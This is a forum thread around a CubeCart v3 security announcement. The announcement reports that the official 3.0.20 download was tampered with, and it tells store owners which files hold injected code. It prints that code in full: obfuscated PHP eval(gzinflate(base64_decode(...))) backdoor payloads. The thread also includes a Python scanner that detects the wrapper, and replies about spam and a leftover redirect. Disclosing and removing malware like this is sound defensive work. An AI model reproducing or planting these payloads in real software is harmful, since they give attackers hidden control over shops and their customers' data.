
Important CubeCart v3 Security Announcement


Al Brookbanks


Over the last week it has been brought to our attention that a number of CubeCart v3 stores have been hacked. After careful examination it became apparent that the 3.0.20 zip file that was hosted on our server had been compromised. Someone had modified this zip file to include a number of pieces of malicious code into a handful of the files....

We expect that the file was compromised from around November 2010 but we can't be sure. As from today the package has been cleaned up and given an MD5 checksum which can be used to verify it in the future. Since November our server underwent some software upgrades to achieve PCI compliance and our helpdesk software managing the package has been upgraded. For this reason we are fairly confident any backdoors have been closed and the file should not be tampered with again.

If you installed CubeCart v3 onto your web hosting account by downloading it from our server please check the following pieces of code are removed from your store if present:

Remove the file:

images/random/chars/T.php

Open the file below (if it exists) and remove the following code from around line 319:

install/index.php

<?php

eval (gzinflate(base64_decode(

'lVZdc6JIFP0rW6l9mHlD0FEqk001oEgTPpQPgZctoB1AQDpi0sKvX/BrIGMl64NV'

.'on1Pn3vuuad4/ufnM47xX38XTw8LAIBWx0zAhKpEw1cvH+1gXWwlYIBAzAoklmBq'

.'oQiYU+yJ8askEBVIYOPnkEKiF7mRFAeMWqOaKuQGS+JDDCvVtafQtixoOzynW4QD'

.'1gC5JhVbVsX5wMXWcmZr9kDhgB3DZYp5aVZMI5FNvFxNkLOYRouGQTqSFwleApV7'

.'88WUhbWL1QpwCz7NVowd+IbFr/kUStNl4Ttq4jfNhBU2f21RohuodrdsLYts7WcA'

.'+OTlHZKXV7TyMBJnCTIw76+WBQDcJsizqDlPh3lcu7nyihj7DVAcDmkv82lpCsmP'

.'+OXACXIVRgsxijQAdpBMMiCDlyU/nAhmNHp4XL/72bfAL9c/hv+idVig9bcHKB7K'

.'QKCIRtu0uyKFm89qz3Qph15mLs2mnhElRoqGIQ3n67maLJmGQfs84ExPzLzVdFSa'

.'OTa8DM/tHCdKBktji2vdkLBslmkgElYR9hnKZ6XML8ugve/y4W9iM5pVVJqT+Qta'

.'YaQkxVp1qtNNMIbnWt1Uxp7jxQ1G2sMUSSGleI7qTL5y7eAblGqgdG+FNZXIRnrF'

.'O/Esr1i68QG3vWdWHhwjnehChOWq30vb26qGSDbv6vX43HJVqCFx6cEwECF26/AD'

.'t+OMDuqm7HAirJRIYy9nK/nKm0x6NWc9oEgaDbOxv3KLD5iswme/7xGo/v/H2kNw'

.'+U2u9k1/ZKLxHW58yX5dU/a01M0prTED7CW/NYYbbqgJgFz5/E8u6oVLw+Oj5seZ'

.'XOY0o7C+GVLNfK73ys7Jn5/W8eWumXmuzCPiJelOqfd5wEhnbh3PCKTFOutCdnKV'

.'dnsOOj7bnb8j3ejcO+toxFMnfmcOTle/s96NflkwV7N1e+bOuck1dcvbFw/t5AGF'

.'5bqZEe29h5cZtRlx2cNWL6H8or8jzqfeaHS97nars9bZqRNHMv7lnPrs4qy655re'

.'ejrenl/H42TS+K+/Wzy1b/W8c2+nijjylDwe9fPu4ot7cmBBfJsbGY59M7PcVN0q'

.'6QD7t3Lhyxwg45PPuxyG7B850c/RnnecZjcVIcT3aaRQmoX/zDrm0x4Fn7Ghv4mx'

.'yYTsSdNbOjZ5Rp6eHr5/f9yt92+77eNz88LwHw=='

)));

?>




Open the files below and remove the following code from the top:

includes/boxes/siteDocs.inc.php

language/nl/lang.inc.php


<?php

eval (gzinflate(base64_decode(

's7ezsS/IKFBwKEgsLi7JKCrVUIl3dw2JVi/OzcxJVY/VtLa34+WCqsnMS84pTUnF'

.'pyS1LDEHi7yNPQA='

)));

?>

We sincerely apologise for any inconvenience that this may have caused.

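The manual checks listed in the announcement above can be automated. The following is an added example, not part of the original post and not CubeCart code: a Python scan of a store directory for the file and the `eval (gzinflate(base64_decode(` wrapper the announcement names, extended to every `.php` file, plus a check of a downloaded archive against the published MD5. The function names are assumptions, and the MD5 value itself is not given on this page, so it must be supplied by the caller.

```python
import hashlib
import re
from pathlib import Path

# Indicators taken from the announcement above.
DROPPED_FILE = "images/random/chars/T.php"
NAMED_FILES = (
    "install/index.php",
    "includes/boxes/siteDocs.inc.php",
    "language/nl/lang.inc.php",
)
# The injected wrapper, tolerating whitespace such as "eval (gzinflate(".
WRAPPER = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)


def scan_store(root):
    """Return a sorted list of (relative_path, reason) findings under root."""
    root = Path(root)
    findings = []
    if (root / DROPPED_FILE).is_file():
        findings.append((DROPPED_FILE, "file named in the announcement exists"))
    # Generalisation: scan every .php file, not only the three named ones.
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        for match in WRAPPER.finditer(data):
            line = data.count(b"\n", 0, match.start()) + 1
            where = "named file" if rel in NAMED_FILES else "other file"
            findings.append((rel, f"encoded eval wrapper at line {line} ({where})"))
    return sorted(findings)


def md5_matches(archive, published_md5):
    """Compare a downloaded archive with the checksum published for it."""
    digest = hashlib.md5()
    with open(archive, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest() == published_md5.strip().lower()


if __name__ == "__main__":
    import sys
    for rel, reason in scan_store(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {reason}")
```

A checksum only helps if it is obtained from somewhere the party who modified the archive could not also change, and a clean scan result covers only the indicators listed in the announcement.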

  • 1 month later...

Guest blackerutuf

I have been having problems with the version 3.0.10, where someone has been sending mass emails on my account, has anyone else had similar problems and been able to overcome it?

Disable tell-a-friend, or enable Flood Control. You really should upgrade to the latest release of v3 before it's discontinued.

  • 5 months later...

Hi,

I've just discovered that I have this problem and I've applied all the amends above.

However my "forgot password" code still leads directly to fbi.gov.

Any clues?
